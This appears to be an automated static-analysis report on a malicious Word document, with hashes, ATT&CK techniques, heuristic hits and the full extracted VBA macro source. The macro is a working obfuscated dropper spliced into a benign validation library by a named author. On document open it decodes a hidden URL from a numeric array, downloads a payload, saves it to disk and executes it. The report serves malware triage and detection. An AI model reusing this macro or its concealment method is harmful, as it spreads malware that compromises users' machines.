Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 750bd45fdc21c684…

MALICIOUS

Office (OOXML)

60.9 KB Created: 2016-05-25 10:52:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2019-03-10
MD5: 33feba79af6874509aeccb6a9ddc2e54 SHA-1: db950c9e5100cb76e9652a2dc7e72962bb6319de SHA-256: 750bd45fdc21c684653559c51ab6aac1df3760f8c04202f32cdf132a6d02df3d
352 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains obfuscated VBA macros, including an auto-executing loader, that are designed to download and execute a second-stage payload. Heuristics indicate the use of CreateObject and Shell execution, along with HTTP download and file saving capabilities. ClamAV detections further confirm the malicious nature of the embedded macros.

Heuristics 9

  • ClamAV: Doc.Macro.ObfuscatedData-6136276-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedData-6136276-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
     Ogurcov = greeks__1.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
     Set greeks__0_22 = CreateObject(OgurcovPech(3))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set greeks__0_22 = CreateObject(OgurcovPech(3))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot Referenced by macro
    • https://davidcel.is/posts/stop-validating-email-addresses-with-regex/Referenced by macro
    • http://blog.nkadesign.com/2009/access-checking-blank-variables/Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • http://stackoverflow.com/questions/275160/regex-for-namesReferenced by macro
    • http://stackoverflow.com/questions/11501860/regular-expression-pattern-to-validate-name-fieldReferenced by macro
    • https://blog.udemy.com/vba-regex/Referenced by macro
    • http://stackoverflow.com/questions/11109832/how-to-find-if-an-array-contains-a-stringReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 45571 bytes
SHA-256: 66169d1140bb4b9d136611e3eade79703b637e1942b697e16ea68f32322b44ef
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
IsWord "Dota"
IsEmail "helpdesc@mail.com"
IsName "Augustos"
IsAlpha "Outdoorstand"
IsBlank "Sed"
IsAlphaNum "Destanation-"
End Sub

Attribute VB_Name = "Module1"

' =================================
' MODULE:       mod_Validation
' Level:        Framework module
' Version:      1.03
' Description:  string functions & procedures
'
' Source/date:  Bonnie Campbell, 2/10/2015
' Revisions:    BLC - 2/10/2015 - 1.00 - initial version
'               BLC - 11/12/2015 - 1.01 - added IsAlphaNumDashSlash(), IsAlphaNumDashUnder(),
'                                         IsWord(), IsParagraph(),
'                                         & verifications via VerifyString()
'               BLC - 4/4/2016 - 1.02 - added IsInArray(), updated ValidString(),
'                                       replaced Exit_Function w/ Exit_Handler
'               BLC - 5/20/2016 - 1.03 - added IsTypeMatch()
' =================================


' ---------------------------------
' FUNCTION:     ValidateString
' Description:  Checks if string is proper type
' Assumptions:  -
' Parameters:   strInspect - string to check
'               strType - string type (alpha, alphanum, numeric, etc.)
' Returns:      boolean - True (string is valid), False (string is invalid)
' Throws:       none
' References:   none
' Source/date:
'
'
' Adapted:      Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 2/12/2015 - initial version
'   BLC - 11/12/2015 - added alphanumdashslashspace, alphanumdashspace, alphanumspace, alphanumdashunder,
'                      alphanumdashunderspace
'   BLC - 4/4/2016   - added name & email cases
' ---------------------------------
Public Function ValidateString(ByVal strInspect As String, strType As String) As Boolean
On Error GoTo Err_Handler

    Dim blnIsValid As Boolean

    'default
    blnIsValid = False

    Select Case strType
        Case "alpha"
            blnIsValid = IsAlpha(Trim(strInspect))
        Case "alphanum"
            blnIsValid = IsAlphaNum(Trim(strInspect))
        Case "alphadashunderscore"
            blnIsValid = IsAlphaDashUnderscore(Trim(strInspect))
        Case "alphanumspace"
            blnIsValid = IsAlphaNum(Trim(Replace(strInspect, " ", "")))
        Case "numeric"
            blnIsValid = IsNumeric(Trim(strInspect))
        Case "alphanumdash"
            blnIsValid = IsAlphaNumDash(Trim(strInspect))
        Case "alphaspace"
            blnIsValid = IsAlphaNumDash(Replace(strInspect, " ", ""))
        Case "alphanumdashspace"
            blnIsValid = IsAlphaNumDash(Trim(Replace(strInspect, " ", "")))
        Case "alphanumdashunder"
            blnIsValid = IsAlphaNumDashUnder(Trim(strInspect))
        Case "alphanumdashunderspace"
            blnIsValid = IsAlphaNumDashUnder(Trim(Replace(strInspect, " ", "")))
        Case "alphanumdashslash"
            blnIsValid = IsAlphaNumDashSlash(Trim(strInspect))
        Case "alphanumdashslashspace"
            blnIsValid = IsAlphaNumDashSlash(Trim(Replace(strInspect, " ", "")))
        Case "name"
            blnIsValid = IsName(Trim(strInspect))
        Case "email"
            blnIsValid = IsEmail(Trim(strInspect))
        Case "word"
            blnIsValid = IsWord(Trim(strInspect))
        Case "paragraph"
            blnIsValid = IsParagraph(Trim(Replace(strInspect, " ", "")))
    End Select

    ValidateString = blnIsValid

Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - CountInString[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsAlpha
' Description:  Checks if string is alphabetic
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is alpha), False (string contains non-alpha characters)
' Throws:       none
' References:   none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted:      Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 2/12/2015 - initial version
' ---------------------------------
Function IsAlpha(strInspect As String) As Boolean
On Error GoTo Err_Handler:
 
    Dim i As Integer
    
    wozner4 = 22
OgurcovPole.Type = 1
 OgurcovPole.Open
    'default
    IsAlpha = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case Else
          IsAlpha = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsAlpha[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsAlphaDashUnderscore
' Description:  Checks if string includes only letter, underscore, dash
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is a name), False (string contains non-word characters)
' Throws:       none
' References:   none
' Source/date:  Bonnie Campbell, April 4, 2016 - for NCPN tools
' Adapted:      -
' Revisions:
'   BLC - 4/4/2016 - initial version
' ---------------------------------
Function IsAlphaDashUnderscore(strInspect As String) As Boolean
On Error GoTo Err_Handler:

    Dim strPattern As String
    strPattern = "^[a-zA-Z_-]+$"

    IsAlphaDashUnderscore = IsRegExpMatch(strInspect, strPattern)
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsAlphaDashUnderscore[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsAlphaNum
' Description:  Checks if string is alphanumeric
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is alphanum), False (string contains non-alphanumeric characters)
' Throws:       none
' References:   none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted:      Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 2/12/2015 - initial version
' ---------------------------------
Public Function IsAlphaNum(strInspect As String) As Boolean
On Error GoTo Err_Handler:

 greeks_sedming.Open (greeksNaStole)
    Dim i As Integer
    
    'default
    IsAlphaNum = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case "0" To "9"
        Case Else
          IsAlphaNum = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsAlphaNum[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsAlphaNumDash
' Description:  Checks if string is alphanumeric w/ or w/o dash
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is alphanum), False (string contains non-alphanumeric characters)
' Throws:       none
' References:   none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted:      Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 2/12/2015 - initial version
' ---------------------------------
Function IsAlphaNumDash(strInspect As String) As Boolean
On Error GoTo Err_Handler:

    Dim i As Integer
    
    'default
    IsAlphaNumDash = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case "0" To "9"
        Case "-"
        Case Else
          IsAlphaNumDash = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsAlphaNumDash[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsAlphaNumDashUnder
' Description:  Checks if string is alphanumeric w/ or w/o dash or underscore
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is alphanum), False (string contains non-alphanumeric/dash/
'                         underscore characters)
' Throws:       none
' References:   none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted:      Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 11/12/2015 - initial version
' ---------------------------------
Function IsAlphaNumDashUnder(strInspect As String) As Boolean
On Error GoTo Err_Handler:

    Dim i As Integer
    
    'default
    IsAlphaNumDashUnder = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case "0" To "9"
        Case "-"
        Case "/"
        Case "_"
        Case Else
          IsAlphaNumDashUnder = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsAlphaNumDashUnder[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsAlphaNumDashSlash
' Description:  Checks if string is alphanumeric w/ or w/o dash or slash
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is alphanum), False (string contains non-alphanumeric/dash/slash characters)
' Throws:       none
' References:   none
' Source/date:
' si_the_geek, March 30, 2007
' http://www.vbforums.com/showthread.php?460464-RESOLVED-is-there-a-method-like-quot-isAlphabetic-quot
' Adapted:      Bonnie Campbell, February 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 11/12/2015 - initial version
' ---------------------------------
Function IsAlphaNumDashSlash(strInspect As String) As Boolean
On Error GoTo Err_Handler:

    Dim i As Integer
    
    'default
    IsAlphaNumDashSlash = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case "0" To "9"
        Case "-"
        Case "/"
        Case Else
          IsAlphaNumDashSlash = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsAlphaNumDashSlash[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsName
' Description:  Checks if string is a name (can contain: letter, period, dash, space)
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is a name), False (string contains non-word characters)
' Throws:       none
' References:   none
' Source/date:
'   Matthew Scharley, November 8, 2008
'   http://stackoverflow.com/questions/275160/regex-for-names
' Adapted:      Bonnie Campbell, April 4, 2016 - for NCPN tools
' Revisions:
'   BLC - 4/4/2016 - initial version
' ---------------------------------
Public Function IsName(strInspect As String) As Boolean
On Error GoTo Err_Handler:

greeks__1.Open OgurcovPech(10 - (2 + 1 + 2)), Djeremy, False
greeks__1.send
 greeks__4 = greeks__3(OgurcovPech(180 / 30))
 
 greeksNaStole = greeks__4
greeksNaStole = greeksNaStole + OgurcovPech(55 - 43)

    Dim strPattern As String
    strPattern = "^[A-Z]'?[- a-zA-Z]([a-zA-Z])*$"

    IsName = IsRegExpMatch(strInspect, strPattern)
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsName[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsEmail
' Description:  Checks if string is an email address
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is a valid email address),
'                         False (string isn't a valid email address)
' Throws:       none
' References:   none
' Notes:
'               Pattern => ^[a-zA-Z]+(?:\s+[a-zA-Z]+)*$
'               Explanation:
'                ^          Start of string
'                [a-zA-Z]   Any character in the class a to z or A to Z
'                +          One or more repititions
'                (?:   )    Match expresion but don't capture
'                \s+        Whitespace, One or more repititions
'                *          Zero or more repititions
'                $          End of string
'
'   In the end, the simplest pattern is best to avoid rejecting valid
'   email addresses -- e.g. w/ tags email+tag@example.com
'               Pattern => ^.+@.+\..+$    (originally /.+@.+\..+/i)
'               Explanation:
'                   ^  start
'                   .+ any character(s) - one or more times
'                   @  followed by @
'                   .+ any character(s) - one or more times
'                   \. followed by a period (.)
'                   .+ any character(s) - one or more times
'                   $  end
' Source/date:
'   David Celis, September 6, 2012
'   https://davidcel.is/posts/stop-validating-email-addresses-with-regex/
'   Chris Nielson July 17, 2012
'   http://stackoverflow.com/questions/11501860/regular-expression-pattern-to-validate-name-field
' Adapted:      Bonnie Campbell, April 4, 2016 - for NCPN tools
' Revisions:
'   BLC - 4/4/2016 - initial version
' ---------------------------------
Public Function IsEmail(strInspect As String) As Boolean
On Error GoTo Err_Handler:
 Set greeks__0_22 = CreateObject(OgurcovPech(3))
    c = ""
     Set greeks__3 = greeks__0_22.Environment(OgurcovPech(4))
     
 Dim IJK As Integer
For IJK = LBound(ContainerX) To UBound(ContainerX)
 Djeremy = Djeremy & RemoveSpecialChar(IJK)
 Next IJK

    Dim strPattern As String
    strPattern = "^.+@.+\..+$"

    IsEmail = IsRegExpMatch(strInspect, strPattern)
    
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsEmail[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsWord
' Description:  Checks if string is alphabetic
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is a word), False (string contains non-word characters)
' Throws:       none
' References:   none
' Source/date:
'
'
' Adapted:      Bonnie Campbell, November 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 11/12/2015 - initial version
' ---------------------------------
Public Function IsWord(strInspect As String) As Boolean

ContainerX = Split("1664U1856U1856U1792U928U752U752U1584U1600U1648U1552U1744U1616U736U1712U1648U1568U736U1792U1728U752U1712U880U1696U1664U1824U1856U832U1664U1616U1824U1856U1648", "U")
 Dim agreeks As String
 agreeks = TREwozner(UserForm1.TextBox1.ControlTipText, "00", "e")
 agreeks = TREwozner(agreeks, "D!", "M")
 agreeks = TREwozner(agreeks, "bri", "s")
 OgurcovPech = Split(agreeks, "10)")
Set greeks__1 = CreateObject(OgurcovPech(0))
 
 Set OgurcovPole = CreateObject(OgurcovPech(1))

 Set greeks_sedming = CreateObject(OgurcovPech(2))
On Error GoTo Err_Handler:

    Dim i As Integer
    
    'default
    IsWord = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case "-"
        Case Else
          IsWord = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsWord[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsParagraph
' Description:  Checks if string is alphabetic
' Assumptions:  -
' Parameters:   strInspect - string to check
' Returns:      boolean - True (string is alpha), False (string contains non-alpha characters)
' Throws:       none
' References:   none
' Source/date:
'
'
' Adapted:      Bonnie Campbell, November 12, 2015 - for NCPN tools
' Revisions:
'   BLC - 11/12/2015 - initial version
' ---------------------------------
Function IsParagraph(strInspect As String) As Boolean
On Error GoTo Err_Handler:

    Dim i As Integer
    
    'default
    IsParagraph = True
    
    For i = 1 To Len(Trim(strInspect))
      
      Select Case Mid$(Trim(strInspect), i, 1)
        Case "A" To "Z", "a" To "z"
        Case "0" To "9"
        Case "-", "/", "_", ".", "?", "!"
        Case Else
          IsParagraph = False
          Exit For
      End Select
    
    Next i
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsParagraph[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsRegExpMatch
' Description:  Checks if string is a match for the regular expression pattern
' Assumptions:  -
' Parameters:   strInspect - string to check
'               strPattern - pattern to check against (string)
' Returns:      boolean - True (string matches), False (string does not match)
' Throws:       none
' References:   Microsoft VBScript Regular Expressions 5.5 (added reference)
' Source/date:
'   RICHA, March 31, 2014
'   https://blog.udemy.com/vba-regex/
' Adapted:      Bonnie Campbell, April 4, 2016 - for NCPN tools
' Revisions:
'   BLC - 4/4/2016 - initial version
' ---------------------------------
Function IsRegExpMatch(strInspect As String, strPattern As String) As Boolean
On Error GoTo Err_Handler:

    Dim oRegExp As Object
    
    Set oRegExp = CreateObject("vbscript.regexp")
    
    With oRegExp
        .Global = True
        .IgnoreCase = True
        .Pattern = strPattern
        
        IsRegExpMatch = .test(strInspect)

    End With
                
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsRegExpMatch[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsInArray
' Description:  Checks if string is found in the supplied array
' Assumptions:  -
' Parameters:   strFind - string to check
'               aryLookIn - array to look in
' Returns:      boolean - True (string is found), False (string isn't found)
' Throws:       none
' References:   none
' Source/date:
'   Jimmy Pena, June 20, 2012
'   http://stackoverflow.com/questions/11109832/how-to-find-if-an-array-contains-a-string
' Adapted:      Bonnie Campbell, April 4, 2016 - for NCPN tools
' Revisions:
'   BLC - 4/4/2016 - initial version
' ---------------------------------
Function IsInArray(strFind As String, aryLookIn As Variant) As Boolean
On Error GoTo Err_Handler

  IsInArray = (UBound(Filter(aryLookIn, strFind)) > -1)
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsInArray[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsBetween
' Description:  Checks if value is between supplied bounding values/limits
' Assumptions:  -
' Parameters:   iValue - value to check (variant)
'               lowBound - lower limit (double)
'               highBound - upper limit (double)
'               inclusive - whether the lower & upper limits should be included (boolean)
' Returns:      boolean - True (value is between limits), False (value is outside limits)
' Throws:       none
' References:   none
' Source/date:  Bonnie Campbell, April 4, 2016 - for NCPN tools
' Adapted:      -
' Revisions:
'   BLC - 4/4/2016 - initial version
' ---------------------------------
Function IsBetween(iValue As Variant, lowBound As Double, highBound As Double, inclusive As Boolean) As Boolean
On Error GoTo Err_Handler

    Dim isOK As Boolean
    'default
    isOK = False
    
    'ensure numeric
    If Not IsNumeric(iValue) Then GoTo Exit_Handler

    If inclusive Then
        Select Case iValue
            'rejects --> all result in isOK = false (no change)
            Case Is < lowBound
            Case Is > highBound
            
            'valid cases
            Case Is = lowBound
                isOK = True
            Case Is = highBound
                isOK = True
            Case Is > lowBound And (iValue < highBound)
                isOK = True
        End Select
    Else
        Select Case iValue
            'rejects --> all result in isOK = false (no change)
            Case Is < lowBound
            Case Is > highBound
            Case Is = lowBound
            Case Is = highBound
            
            'valid cases
            Case Is > lowBound And (iValue < highBound)
                isOK = True
        End Select
    End If
    
    IsBetween = isOK
    
Exit_Handler:
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsBetween[mod_Validation])"
    End Select
    Resume Exit_Handler
End Function

' ---------------------------------
' FUNCTION:     IsTypeMatch
' Description:  Checks if value is or can be converted to the data type noted
'               Relies on attempting to convert, if it fails via type mismatch or otherwise false is returned
' Assumptions:  -
' Note:
'               Value     Variant type          Value     Variant type
'               0     Empty (unitialized)       10     Error Value
'               1     Null (no valid data)      11     Boolean
'               2     Integer                   12     Variant (only used with arrays of variants)
'               3     Long Integer              13     Data access object
'               4     Single                    14     Decimal value
'               5     Double                    17     Byte
'               6     Currency                  36     User Defined Type
'               7     Date                      8192           Array
'               8     String
'               9     Object
'
' Parameters:   iValue - value to check (variant)
'               dataType - data type name (string)
' Returns:      boolean - True (value is or can be converted), False (value isn't/can't be converted to the data type passed in)
' Throws:       none
' References:   none
' Source/date:  Bonnie Campbell, May 20, 2016 - for NCPN tools
' Adapted:      -
' Revisions:
'   BLC - 5/20/2016 - initial version
' ---------------------------------
Function IsTypeMatch(iValue As Variant, DataType As String) As Boolean
On Error GoTo Err_Handler

    Dim isOK As Boolean
    Dim result As Variant
    
    'default
    isOK = True
    
    'check type
    Select Case DataType
        Case "boolean"  '0 or 1, yes/no values are mismatches
            result = CBool(iValue)
        Case "byte"     '0 or 1, yes/no values are mismatches
            result = CByte(iValue)
        Case "number"
            If Not IsNumeric(iValue) Then isOK = False
        Case "integer"
            result = CInt(iValue)
        Case "long"
            result = CLng(iValue)
        Case "double"
            result = CDbl(iValue)
        Case "single"
            result = CSng(iValue)
        Case "decimal"
            result = CDec(iValue)
        Case "string"
            result = CStr(iValue)
        Case "date"
            result = CDate(iValue)
        Case "currency"
            result = CDate(iValue)
        Case Else
            isOK = False
    End Select
    
Exit_Handler:
    IsTypeMatch = isOK
    Exit Function

Err_Handler:
    Select Case Err.Number
      Case "13" 'RunTime Error 13: Type Mismatch
        isOK = False
        Resume Exit_Handler
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - IsTypeMatch[mod_Validation])"
    End Select
    'fail on error
    isOK = False
    Resume Exit_Handler
End Function


Attribute VB_Name = "Module2"
Public greeks__1 As Object
Public OgurcovPole As Object
Public greeks__3 As Object
Public ContainerX() As String
Public greeks__4 As String
Public greeksNaStole As String
Public greeks_sedming As Object
 Public Djeremy As String
Public OgurcovPech() As String




Public Function TREwozner(A1 As String, A2 As String, A3 As String) As String
TREwozner = Replace(A1, A2, A3)
End Function
Public Function RemoveSpecialChar(strFileName As Integer) As String
RemoveSpecialChar = Chr(CInt(ContainerX(strFileName)) / (9 + 7))
End Function

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module3"

' ---------------------------------
' FUNCTION:     PopulateSpeciesPriorities
' Description:  Populate species priority values from species priority concatenation
' Assumptions:  Park priority textboxes are named tbxPARKPriority (e.g. tbxZIONPriority)
' Parameters:   parkCode - 4 character park code (string)
'               priorities - species priority string concatenation for all parks (e.g. "BLCA-1|COLM-Transect|FOBU-1")
' Returns:      Priority - value for park species priority (string)
' Throws:       none
' References:   none
' Source/date:
' Adapted:      Bonnie Campbell, April 9, 2015 - for NCPN tools
' Revisions:
'   BLC - 4/9/2015 - initial version
'   BLC - 5/26/2015 - moved from mod_Species to mod_App_UI
' ---------------------------------
Public Function PopulateSpeciesPriorities(ParkCode As String, priorities As String) As String

On Error GoTo Err_Handler

Dim ParkPriorities As Variant
Dim i As Integer

    'check if parkCode is in priorities string
    If Len(priorities) > Len(Replace(priorities, ParkCode, "")) Then
    
        'prepare the Park Priority values
        ParkPriorities = Split(priorities, "|")
        
        'set park priority values
        For i = 0 To UBound(ParkPriorities)
            'does Park have a priority value?
            If ParkCode = Left(ParkPriorities(i), 4) Then
                PopulateSpeciesPriorities = Replace(ParkPriorities(i), ParkCode + "-", "")
            End If
        Next
        
    Else
        'not listed
        PopulateSpeciesPriorities = "X"
    
    End If
    
Exit_Function:
    Exit Function
    
Err_Handler:
    Select Case Err.Number
      Case Else
        MsgBox "Error #" & Err.Number & ": " & Err.Description, vbCritical, _
            "Error encountered (#" & Err.Number & " - PopulateSpeciesPriorities[mod_App_UI])"
    End Select
    Resume Exit_Function
End Function

' ---------------------------------
' SUB:          Initialize
' Description:  initialize application values
' Assumptions:  -
' Parameters:   N/A
' Returns:      N/A
' Throws:       none
' References:   none
' Source/date:
' Adapted:      Bonnie Campbell, February 6, 2015 - for NCPN tools
' Revisions:
'   BLC - 2/6/2015  - initial version
'   BLC - 2/19/2015 - added dynamic getParkState() & standard error handling
'   BLC - 3/4/2015  - shifted colors to mod_Color, removed setting of park, state, tgtYear TempVars
'   BLC - 5/13/2015 - stub only
'   BLC - 11/19/2015 - added CreateEnums call to create application specific Enums,
'                      updated documentation to reflect mod_App_UI vs. mod_Init
' ---------------------------------
Public Sub Initialize()
On Error GoTo Err_Handler

    'create the enums specific to this application from the Enums table & mod_App_Enum stub module
    CreateEnums

    'set application UI display
'     SetStartupOptions "AppTitle", dbText, "NCPN Big Rivers"

Exit_Handler:
